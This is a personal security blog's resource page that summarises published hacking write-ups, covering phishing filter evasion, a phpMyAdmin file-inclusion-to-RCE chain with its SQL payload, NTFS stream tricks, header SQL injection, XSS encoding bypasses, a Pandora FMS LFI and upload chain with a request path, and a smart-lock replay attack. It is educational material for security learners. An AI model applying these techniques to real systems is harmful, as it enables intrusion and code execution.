Resources

People often ask me "How did you learn how to hack?" The answer: by reading. This page is a collection of the blog posts and other articles that I have accumulated over the years of my journey. Enjoy!

The weakest part of a companies security is always the people!

So, phishing schemes are quite effective ways at attacking a company.

However, email providers have figured this out. As such, natural language processors have been developed in order to find phishing schemes.

In order to bypass these natural language processors, the attackers used a zero-width font. People are creative in order to bypass these restrictions!

Solidity is the language used to code smart contracts on the Ethereum Blockchain. Once something is on the chain, it cannot be revoked! So, being secure with smart contracts is very important.

This article gives a list of essentially all attack vectors for smart contracts. From there, it gives an example of vulnerable in code with steps for exploitation. Finally, there is an included preventive techniques area.

Great article if you are into smart contract security!

The first evidence of this vulnerability was when the code include $_REQUEST['target'] was found. This says to include a file that is coming directly from a parameter!

Next, there is a filter. First, it checks for a valid page path and if the file is not import.php or export.php. By double URL encoding the question mark in the path, any file can be called!

In order to turn this into an RCE, we need to make an SQL query, "select '<?php phpinfo();exit;?>' ". This will be written to the database file, which makes it callable!

Additional link for exploitation: ChaMd5 Security Team.

Several of these issues are quite amazing (and have not been patched). However, before getting to the cool tricks themselves, there is something greater about this article.

• When people code, they check and validate for what they actually know is legal and allowed. But, what if something isn’t accounted for? What happens then?
• It’s really important to think as the programmer; what would have you done for this?
• These things aren’t accounted for, like weird encodings, edge cases, real representation of string, then bypasses start to happen.
• Finding the usable but not ‘normal’ way, is where a lot of bypasses live at.

Files in NTFS are stored in the following form: ::. This will help for the rest of the bypasses below.

Create Folders without the proper Permissions: Although this was patched, it is still interesting. “::$INDEX_ALLOCATION” to the end of a filename will create a folder instead of a file and Windows currently doesn’t include a check for this corner case.

Bypass Path Restrictions with Alternate Data Streams: The default data stream is data. However, there are multiple other data streams in Windows that can be used. Using different data streams can bypass simply whitelisting solutions.

Create Files which can't be found by using the "..." folder: Normally files with just dots cannot be created. But, by using the index allocation trick, this can be done.

"Hide" the Destination of a Directory Junction: Junctions are like symbolic links in windows. It is possible to hide these using the index allocation trick.

Overall, there is understanding how the system works and abusing its features to make something beautiful :)

While looking at the X-Forwarded-To header for a white/blacklist, the author noticed that it was being processed in someway. After adding some other inputs to the header, an SQL error occurred.

By using a time-based attack, data from the database was taken.

Takeaways:

• Headers are a valid place to look for vulnerabilities, particularly how they are being processed.
• Understand what normal is. If something is not normal, then evaluate it for a potential vulnerability.

After taking apart the Amazon Android mobile application he found a URL that the author had not seen before.

This URL had a parameter that was reflected directly into JavaScript. By inserting a marquee tag the text went across the screen!

There were several mechanisms that had to be bypassed. To start with, all letters were capitalized. This was bypassed by HTML encoding all the characters then URL encoding this.

Overall, this article has several cool tricks for bypassing restrictions (octal character encoding or jscrewit).

This article has a great description of the Apache Struts RCE that took over Equifax. McAfee does great research and work! :)

Essentially, there is an issue with the parsing engine that deserializes objects.

Anytime there is serialization or deserialization within a program, this is likely going to be riddled with bugs. Always attack the serialization. It may take time and a deep understanding of the system but it is worth-while!

Pandora FMS is a server monitor service that is dockerized.

Several vulnerabilites were found, eventually leading to an RCE by the chaining of two vulns. Besides those, there is a reflected XSS payload because of content being directly inserted into a the JavaScript.

An unauthenticated local file inclusion (LFI) can also be performed. This is done by making a request to GET /pandora_console/ajax.php?page=include/config, then the .php will be added to the end of the file. This LFI will execute PHP!

Using the LFI above, this can be used to upload plugins in the form of a zip file. By doing this, it is possible to upload a malicious PHP shell that will be unzipped and callable by the user.

By chaining the LFI with the file upload functionality, an unauthenticated RCE (Remote Code Execution) is created. Chaining bugs is almost interesting to create bigger issues!

I always enjoy when ridcioulous/ untrue security claims are made. This lock claims that "'AES 128-bit encryption' with an inference that their security is on a parallel with the military". LOL

With lots of IoT products it is not just about the software itself... The software on the lock is useless if the hardware/physical aspect of the lock can easily be bypassed.

This lock was vulnerable to a replay attack. Essentially, even though the data is encrypted, just resend the encrypted data.